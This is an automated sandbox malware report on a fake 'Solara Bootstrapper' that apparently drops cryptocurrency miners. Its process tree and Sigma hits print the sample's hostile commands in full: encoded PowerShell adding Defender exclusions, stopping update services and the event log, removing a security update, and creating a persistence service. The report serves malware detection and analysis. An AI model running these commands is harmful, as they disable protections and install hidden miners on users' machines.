Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Solara Bootstrapper.exe

Overview

General Information

Sample name:Solara Bootstrapper.exe
Analysis ID:1585414
MD5:00a1864355a5ea47902e5757c0d87fd9
SHA1:4be5647308e0925fb00fae068cb4a89a8a449afc
SHA256:4289002fd7528974ae7a9bf4d855bfd3812d248a46dbd7f94e7336f260ae7a39
Tags:CoinMinerexeuser-aachum
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Encrypted powershell cmdline option found
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses powercfg.exe to modify the power settings
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Execution of Powershell with Base64
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • Solara Bootstrapper.exe (PID: 5516 cmdline: "C:\Users\user\Desktop\Solara Bootstrapper.exe" MD5: 00A1864355A5EA47902E5757C0D87FD9)
    • powershell.exe (PID: 348 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZgBpACMAPgA=" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • kx new.exe (PID: 1020 cmdline: "C:\Users\user\AppData\Local\Temp\kx new.exe" MD5: D9D13FA25E880665FB471A4BE57C494C)
      • powershell.exe (PID: 3116 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA=" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Kawpow new.exe (PID: 7244 cmdline: "C:\Users\user\AppData\Local\Temp\Kawpow new.exe" MD5: FB6A3B436E9F9402937D95F755B62F91)
        • powershell.exe (PID: 7336 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7784 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wusa.exe (PID: 7872 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
        • sc.exe (PID: 7792 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 7808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 7896 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 7904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 7936 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 7944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 7976 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 7992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 8152 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 8168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 7300 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 2964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 2820 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 5428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 6004 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 6540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 432 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 3292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • dialer.exe (PID: 7504 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
          • winlogon.exe (PID: 564 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
        • sc.exe (PID: 7396 cmdline: C:\Windows\system32\sc.exe delete "CKTJZLMO" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 2300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 3620 cmdline: C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 5492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 7792 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 7908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 7884 cmdline: C:\Windows\system32\sc.exe start "CKTJZLMO" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 7856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • xmr new.exe (PID: 7376 cmdline: "C:\Users\user\AppData\Local\Temp\xmr new.exe" MD5: 7D6398EBFB82A24748617189BF4AD691)
        • powershell.exe (PID: 7404 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WmiPrvSE.exe (PID: 7564 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • cmd.exe (PID: 7984 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 8008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wusa.exe (PID: 8084 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
        • sc.exe (PID: 8000 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 8028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 8112 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 8120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 8160 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 8176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 4676 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 7152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 7272 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 7324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 5960 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 3116 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 5448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 7680 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 7716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 3772 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • dialer.exe (PID: 7464 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
          • lsass.exe (PID: 640 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
        • sc.exe (PID: 7968 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 7956 cmdline: C:\Windows\system32\sc.exe start "CKTJZLMO" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 7952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • SolaraBootstrapper.exe (PID: 3948 cmdline: "C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe" MD5: 6557BD5240397F026E675AFB78544A26)
      • conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • eejhedztifcv.exe (PID: 7948 cmdline: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe MD5: FB6A3B436E9F9402937D95F755B62F91)
  • eejhedztifcv.exe (PID: 7612 cmdline: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe MD5: FB6A3B436E9F9402937D95F755B62F91)
  • cleanup
No configs have been found
No yara matches

Change of critical system settings

barindex
Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Kawpow new.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Kawpow new.exe, ParentProcessId: 7244, ParentProcessName: Kawpow new.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 7300, ProcessName: powercfg.exe

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZgBpACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZgBpACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Solara Bootstrapper.exe", ParentImage: C:\Users\user\Desktop\Solara Bootstrapper.exe, ParentProcessId: 5516, ParentProcessName: Solara Bootstrapper.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZgBpACMAPgA=", ProcessId: 348, ProcessName: powershell.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Kawpow new.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Kawpow new.exe, ParentProcessId: 7244, ParentProcessName: Kawpow new.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7336, ProcessName: powershell.exe
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZgBpACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZgBpACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Solara Bootstrapper.exe", ParentImage: C:\Users\user\Desktop\Solara Bootstrapper.exe, ParentProcessId: 5516, ParentProcessName: Solara Bootstrapper.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZgBpACMAPgA=", ProcessId: 348, ProcessName: powershell.exe
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Kawpow new.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Kawpow new.exe, ParentProcessId: 7244, ParentProcessName: Kawpow new.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto", ProcessId: 3620, ProcessName: sc.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZgBpACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZgBpACMAPgA=", CommandLine|base64offset|contains: Ijw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Solara Bootstrapper.exe", ParentImage: C:\Users\user\Desktop\Solara Bootstrapper.exe, ParentProcessId: 5516, ParentProcessName: Solara Bootstrapper.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZgBpACMAPgA=", ProcessId: 348, ProcessName: powershell.exe

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Kawpow new.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Kawpow new.exe, ParentProcessId: 7244, ParentProcessName: Kawpow new.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 7792, ProcessName: sc.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-07T16:09:11.358836+010028033053Unknown Traffic192.168.2.549706140.82.121.3443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Solara Bootstrapper.exeAvira: detected
Source: C:\Users\user\AppData\Local\Temp\kx new.exeAvira: detection malicious, Label: TR/Dropper.Gen
Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeReversingLabs: Detection: 33%
Source: C:\Users\user\AppData\Local\Temp\kx new.exeReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeReversingLabs: Detection: 73%
Source: Solara Bootstrapper.exeReversingLabs: Detection: 68%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\kx new.exeJoe Sandbox ML: detected
Source: Solara Bootstrapper.exeJoe Sandbox ML: detected
Source: Solara Bootstrapper.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: Binary string: T].PdBB?0_$u3J~7 source: Solara Bootstrapper.exe, 00000000.00000002.2100460502.0000000003887000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Ashtin\Desktop\WTF\SolaraBootstrapper\SolaraBootstrapper\obj\Debug\SolaraBootstrapper.pdbgI source: Solara Bootstrapper.exe, 00000000.00000002.2099938407.00000000013D0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Ashtin\Desktop\WTF\SolaraBootstrapper\SolaraBootstrapper\obj\Debug\SolaraBootstrapper.pdb source: Solara Bootstrapper.exe, 00000000.00000002.2099938407.00000000013D0000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\conhost.exeCode function: 2_2_0000019A4980DCE0 FindFirstFileExW,2_2_0000019A4980DCE0
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 15_2_000001F43C54DCE0 FindFirstFileExW,15_2_000001F43C54DCE0
Source: C:\Windows\System32\winlogon.exeCode function: 53_2_000001E8589BDCE0 FindFirstFileExW,53_2_000001E8589BDCE0
Source: C:\Windows\System32\lsass.exeCode function: 68_2_00000140AE86DCE0 FindFirstFileExW,68_2_00000140AE86DCE0
Source: global trafficHTTP traffic detected: GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1Host: github.comConnection: Keep-Alive
